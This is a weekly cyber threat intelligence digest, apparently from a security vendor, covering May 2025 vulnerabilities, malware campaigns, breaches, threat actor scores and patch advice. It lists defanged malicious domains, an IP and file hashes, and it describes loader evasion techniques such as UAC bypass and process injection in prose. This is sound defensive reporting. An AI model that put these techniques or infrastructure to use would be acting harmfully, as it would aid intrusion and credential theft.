Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
CISA adds vulnerability CVE-2025-4632 to its known exploited vulnerability catalogue - On the 22nd of May 2025, the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical severity vulnerability CVE-2025-4632 to its known Exploited Vulnerability catalogue.
CVE-2025-4632 is a path traversal vulnerability in Samsung MagicINFO 9 Server versions 21.1052 and prior. Exploitation of this vulnerability could allow threat actors to create an arbitrary file, thereby enabling them to execute arbitrary code. The Hacker News reported on May 14, 2025, that unidentified threat actors are exploiting CVE-2025-4632 to deploy the Mirai botnet.
EclecticIQ Discloses Active Exploitation of CVE-2025-4428 By Chinese State-Sponsored Group - On May 21st, EclecticIQ assessed that the active intrusion campaign exploiting Ivanti Endpoint Manager Mobile vulnerability CVE-2025-4428 was very likely linked to the Chinese espionage group UNC5221. The vulnerability was publicly disclosed on May 15th and EclecticIQ observed exploitation of the vulnerability happening the same day. They observed threat actors targeting multiple regions, including North America, Europe, and the Asia-Pacific, as well as major sectors within these regions, such as healthcare, government, telecommunications, and defence.
CVE-2025-4428, as stated by Ivanti, this vulnerability is a remote code execution vulnerability in Ivanti Endpoint Manager Mobile, allowing attackers to execute arbitrary code on the target system.
Atlassian Discloses Patches for High Severity Vulnerabilities in Bamboo, Confluence, Fisheye/Crucible, and Jira - On May 20, 2025, Atlassian published a security bulletin detailing high-severity flaws in Bamboo, Confluence, Fisheye/Crucible, and Jira. These vulnerabilities originate from issues with third-party libraries integrating into Atlassian software. If these flaws were exploited, an attacker could trigger a denial-of-service condition or escalate privileges on the affected system.
Currently, at the time of writing, there have been no reports of the vulnerabilities being exploited in the wild. The vulnerabilities disclosed in the security bulletin are detailed below:
- CVE-2025-22157 - A privilege escalation flaw affecting Jira Core Data Centre and Jira Service Management Data Centre
- CVE-2025-31650 - A DoS flaw affecting Bamboo and Confluence Data Centre and Server
- CVE-2025-24970 - A DoS flaw affecting Jira Software Data Centre and Server, and Jira Service Management Data Centre and Server
- CVE-2024-47072 - A DoS flaw affecting Confluence Data Centre and Server
- CVE-2024-57699 - A DoS flaw affecting Fisheye/Crucible Data Centre and Server
Potential Threats
Inskit Group Validates TTPs for Detecting CoffeeLoader - On May 27th, Recorded Futures Inskit Group published a write-up that validated the TTPs of CoffeeLoader. Zscaler ThreatLabz identified CoffeeLoader on March 26th, 2025, and it was first observed dating back to September 2024.
Zscaler ThreatLabz linked this attack to the SmokeLoader malware family, with CoffeeLoader deploying Rhadamanthys shellcode. The loader has been observed to use advanced evasion and hardware-based techniques to bypass AV, EDR, and sandbox detection.
Malvertising Campaign Uses Kling AI to Deliver PureHVNC RAT - On May 20th, cybersecurity firm Check Point Research published details of a global malvertising campaign that exploits Kling AI. The cybersecurity firm began monitoring the threat campaign in early 2025.
Check Point Research observed threat actors utilising paid ads and Facebook pages that, when clicked by a user, would redirect them to a convincing spoof of the Kling AI website. This would prompt the user to upload an image or input a text prompt, resulting in an AI-generated media file. However, the file was a ZIP archive containing a malicious Windows executable (.exe).
CISA and FBI Detail TTPs Used by LummaC2 Against US Infrastructure Sectors - On May 21, 2025, CISA and the FBI released a joint advisory detailing the tactics, techniques, and procedures (TTPs) used by unidentified actors to deploy the LummaC2 information-stealer against US critical infrastructure. Its rising popularity is reflected in criminal markets, where log sales rose 71.7% from April to June 2024 compared to the same period in 2023.
Threat actors deliver LummaC2 via phishing emails with CAPTCHA-gated links that prompt clipboard-based PowerShell execution, or through fake installers posing as legitimate applications, such as media players or system tools.
General News
Adidas Discloses the Breach of Customer Data - On May 23rd, 2025, Adidas, the German sports apparel and footwear corporation, confirmed a data breach in which an unauthorised attacker obtained certain consumers' data through a third-party service provider. Adidas Stated, "We immediately took steps to contain the incident and launched a comprehensive investigation, collaborating with leading information security experts."
The compromised data primarily consisted of contact details of consumers who had previously contacted the company's customer service help desk. Adidas also confirmed that no passwords, credit card information, or other payment-related details were compromised as a result of the data breach.
Adidas stated that "they are currently in the process of informing potentially affected consumers as well as appropriate data protection and law enforcement authorities consistent with applicable law"
Sensitive data stolen in West Lothian cyber attack - On May 21st, 2025, local authorities confirmed that "Sensitive" or "Personal data" was stolen during a ransomware attack on West Lothian Council's education network.
The Council was alerted to a suspected cyber attack on May 6th, two weeks ago. The attack affected IT systems used by its 13 secondary schools, 69 primary schools, and 61 nurseries. The education network was quickly isolated from the rest of the council's network, and no evidence was provided that other systems were affected.
Most of the stolen data was related to operational issues, such as lesson planning. However, officials have now accepted that some personal information was also taken. The council was alerted that sensitive data had been taken due to a passport being scanned online. It has not been confirmed if the passport belonged to a child or an adult. The council did state that less than 10 percent of servers were stolen.
Ransomware hackers charged, infrastructure dismantled in international law enforcement operation - Last week, North American and European law enforcement joined forces in Operation Endgame, dismantling major ransomware infrastructure. Europol reported the takedown of 300 servers, 650 domains, and the seizure of £3.5 million. Multiple arrest warrants were issued, and the U.S. charged 16 members of the DanaBot malware group, which infected 300,000 computers and caused at least £50 million in damages.
The operation targeted malware used for initial system access before ransomware deployment, disrupting not only DanaBot but also variants like Bumblebee, Qakbot, and Trickbot. These tools are often sold to other cybercriminals. U.S. authorities are now working with the U.K.-based Shadowserver Foundation to alert additional DanaBot victims.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.
| ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity |
| Threat Actor | Severity Increase | Opportunity | Intent | ||||||
|---|---|---|---|---|---|---|---|---|---|
| GRU 85 Main Special Service Centre | NEW | → | ● Basic | NEW | → | ● 49 | NEW | → | ● 30 |
| UNC5221 | NEW | → | ● Basic | NEW | → | ● 45 | NEW | → | ● 25 |
| Bert Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
| World Leaks Ransomware Group | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 30 |
| LongNight | NEW | → | ● Basic | NEW | → | ● 25 | NEW | → | ● 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is linked to how actively trending it is and is marked with a small symbol.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets | ||||
|---|---|---|---|---|---|---|---|
| Taiwan | ▲ |
Evilginx |
▲ | CVE-2025-0994 | ▲ |
Adidas |
▲ |
|
Laundry Bear |
▲ |
Embargo Ransomware |
▲ | CVE-2025-37899 | ▲ |
Microsoft |
▲ |
|
TAG-110 (UAC-0063) |
▲ |
Rhysida |
▲ | CVE-2025-32756 | ▲ |
NATO |
▲ |
|
BlueDelta |
▲ |
Safepay Ransomware |
▲ | CVE-2025-20118 | ▲ |
Food and Beverage |
▲ |
|
DieNet |
▲ |
HATVIBE |
▲ |
CVE-2025-4664 |
▲ |
Solana |
▲ |
Prominent Information Security Events
Inskit Group Validates TTPs for Detecting CoffeeLoader
Source: Insikt Group, Zscaler ThreatLabz | Validated Intelligence Event
IOC: Domain - hxxps://freeimagecdn[.]com/
IOC: Domain - hxxps://mvnrepo[.]net/
IOC: SHA256 - c930eca887fdf45aef9553c258a403374c51b9c92c481c452ecf1a4e586d79d9
IOC: SHA256 - 8941b1f6d8b6ed0dbc5e61421abad3f1634d01db72df4b38393877bd111f3552
On May 27, 2025, Recorded Future's Insikt Group released a write-up validating CoffeeLoader's tactics, techniques, and procedures (TTPs), based on earlier research by Zscaler ThreatLabz. First identified in March 2025, CoffeeLoader has been active since at least September 2024 and is linked to the SmokeLoader malware ecosystem. It has been used to deploy Rhadamanthys shellcode and is noted for its advanced evasion capabilities, indicating its use by sophisticated threat actors seeking to evade AV, EDR, and sandbox detection.
CoffeeLoader uses a custom packer called "Armoury" that offloads decryption routines to the GPU via OpenCL, making analysis in virtual environments more difficult. The malware installs as ArmouryAIOSDK.dll and may persist using scheduled tasks. If not run with elevated privileges, it will bypass User Account Control (UAC) through CMSTPLUA COM interfaces. It injects its payload into a suspended DLLhost.exe process and employs techniques like call stack spoofing, DJB2-hashed API resolution, RC4 encryption, and optional Windows fibres for stealth.
Communication with command-and-control (C2) servers occurs over HTTPS with hard-coded iPhone-like user-agent strings and TLS certificate pinning. CoffeeLoader can execute shellcode, EXEs, and DLLs from its C2, and includes a fallback domain generation algorithm (DGA) for redundancy. Its similarities to SmokeLoader include bot ID and mutex generation, hashed imports, and scheduled task persistence, marking it as a highly evasive and resilient threat.
Malvertising Campaign Uses Kling AI to Deliver PureHVNC RAT
Source: Insikt Group, Check Point Research | Validated Intelligence Event
IOC: SHA256 - F5B31BD394E0A3ADB6BD175207B8C3CCC51850C8F2CEE1149A8421736168E13E
IOC: SHA256 - F89298933FED52511BB78F8F377979190E37367D72CCF4F3B81374A70362CC42
IOC: Domain - klingaimedia[.]com
IOC: IP - 185.149.232[.]197
On May 20, 2025, cybersecurity firm Check Point Research reported a global malvertising campaign exploiting Kling AI, a sophisticated text-to-video generation tool. Threat actors used fake Facebook pages and paid ads to redirect users to spoofed websites, such as klingaimedia[.]com, which remains online. Victims were prompted to upload images or text prompts, then offered a seemingly AI-generated media download. However, the file was a ZIP archive containing a malicious Windows executable (.exe) disguised with double extensions and special Unicode characters to obscure its true nature.
Once launched, the loader performed anti-analysis checks to evade detection tools and virtual machine environments. It established persistence by copying itself to the %APPDATA%\Local directory and modifying Windows registry Run keys. To avoid detection, it injected itself into trusted system processes such as InstallUtil.exe and AddInProcess32.exe. The malware followed embedded commands to decide whether to disable antivirus software, self-delete, or restart after termination, enhancing its stealth and longevity.
The final stage of the attack involved deploying an obfuscated PureHVNC remote access trojan (RAT). This tool enabled hidden remote control of the infected system, allowing threat actors to steal credentials, monitor browser extensions, and track cryptocurrency-related activity. PureHVNC included a plugin that captured screenshots of financial or crypto-related windows and transmitted them to the attacker's command and control server, making the campaign particularly dangerous for users involved in online banking or digital asset management.
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-4632: Apply the SVP-MAY-2025 Samsung security update to all affected devices.
- CVE-2025-4428: Install one of the fixed versions such as 11.12.0.5, 12.3.0.2, 12.4.0.2 or 12.5.0.1.
- CVE-2025-22157, CVE-2025-31650, CVE-2025-24970, CVE-2024-47072 and CVE-2024-57699: Patch Atlassian instances to the lastest version to fix these vulnerabilities.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.